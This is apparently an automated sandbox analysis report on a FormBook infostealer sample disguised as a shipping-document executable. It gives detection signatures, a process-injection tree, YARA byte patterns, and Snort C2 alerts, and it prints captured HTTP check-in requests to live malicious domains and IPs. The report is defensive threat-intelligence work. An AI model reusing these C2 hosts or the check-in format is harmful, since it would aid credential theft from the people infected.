Windows Analysis Report
AWB NO. 077-57676135055.exe

Overview

General Information

Sample name:AWB NO. 077-57676135055.exe
Analysis ID:1467058
MD5:d0aa9dae95ef6311340a157817230bf0
SHA1:80019b077b5c1ded0b6485443100c66e94d92e3a
SHA256:089fa75d9d15b2c8abbaf0daf126b72c8e22dbddb31f56e50f4a19c90065b10f

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • AWB NO. 077-57676135055.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe" MD5: D0AA9DAE95EF6311340A157817230BF0)
    • svchost.exe (PID: 3516 cmdline: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • jFlHFdZgIYNZqR.exe (PID: 4468 cmdline: "C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 2268 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • jFlHFdZgIYNZqR.exe (PID: 7100 cmdline: "C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b9c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1442f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b9c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1442f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16ba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ef33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ParentImage: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe, ParentProcessId: 7988, ParentProcessName: AWB NO. 077-57676135055.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ProcessId: 3516, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ParentImage: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe, ParentProcessId: 7988, ParentProcessName: AWB NO. 077-57676135055.exe, ProcessCommandLine: "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe", ProcessId: 3516, ProcessName: svchost.exe

            AV Detection

            Source: http://www.lakemontbellevue.com/bjbg/ | Avira URL Cloud: Label: malware
            Source: AWB NO. 077-57676135055.exe | ReversingLabs: Detection: 47%
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: AWB NO. 077-57676135055.exe | Joe Sandbox ML: detected
            Source: AWB NO. 077-57676135055.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18449708265.000000000051E000.00000002.00000001.01000000.00000004.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23184750264.000000000051E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_00464696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00464696
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_0046C93C FindFirstFileW,FindClose,0_2_0046C93C
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_0046C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_0046C9C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_0046F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F200
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_0046F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F35D
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_0046F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_0046F65E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_00463A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463A2B
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_00463D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463D4E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe | Code function: 0_2_0046BF27 FindFirstFileW,FindNextFileW,FindClose,0_2_0046BF27

            Networking

            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49773 -> 74.208.236.38:80
            Source: Traffic | Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.11.20:49774 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49774 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49775 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49777 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49778 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49779 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49781 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49782 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49783 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49784 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49785 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49787 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49788 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49790 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49791 -> 66.235.200.145:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49792 -> 66.235.200.145:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49794 -> 66.235.200.145:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49795 -> 103.120.176.124:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49796 -> 103.120.176.124:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49798 -> 103.120.176.124:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49799 -> 203.161.50.127:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49800 -> 203.161.50.127:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49802 -> 203.161.50.127:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49803 -> 172.67.146.224:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49804 -> 172.67.146.224:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49806 -> 172.67.146.224:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49807 -> 44.227.65.245:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49808 -> 44.227.65.245:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49810 -> 44.227.65.245:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49811 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49812 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49814 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49815 -> 84.32.84.192:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49816 -> 84.32.84.192:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49818 -> 84.32.84.192:80
            Source: Traffic | Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.11.20:49820 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49820 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49821 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49823 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49824 -> 74.208.236.38:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49825 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49826 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49828 -> 142.202.6.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49829 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49830 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49831 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49832 -> 74.208.236.230:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49833 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49834 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49835 -> 199.59.243.226:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49836 -> 199.59.243.226:80
            Source: DNS query: www.spotluv.xyz
            Source: Joe Sandbox ViewIP Address: 66.235.200.145 66.235.200.145
            Source: Joe Sandbox ViewIP Address: 203.161.50.127 203.161.50.127
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN NETMAGIC-APNetmagicDatacenterMumbaiIN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004725E2
            Source: global trafficHTTP traffic detected: GET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1Host: www.costmoon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.6171nvuhb.rentAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.motorsportgives.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.orthonow.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /3c1k/?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.musiccitysauce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /bjbg/?_B7=LxyxWrj8kri0gh&vX=PaEFrgJgmJNh1u/DWUxMIeDskG5qzMhDGrQ71u93fIH85Lzxsg5t1cmIlpAxPUwLJ58UUf9JzsDSaHkwZqJSKveW5uukdz+QiIy0PILQ7uEd2NrIiK6nDiA= HTTP/1.1Host: www.lakemontbellevue.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh HTTP/1.1Host: www.vintagewins.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
            Source: global trafficHTTP traffic detected: GET /pci0/?_B7=LxyxWrj8kri0gh&vX=eSBSxWzRVUHV/fBDA1gktKapDAjXHwIYGqgWiDMm1TKOgAQN0YKNcvcCpBWCJxpF3POgg0Ef/1qs6yZQX/5+pidIDj1j3gicnpT8MY0pZ20V89EBh37W5PY= HTTP/1.1Host: www.spotluv.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
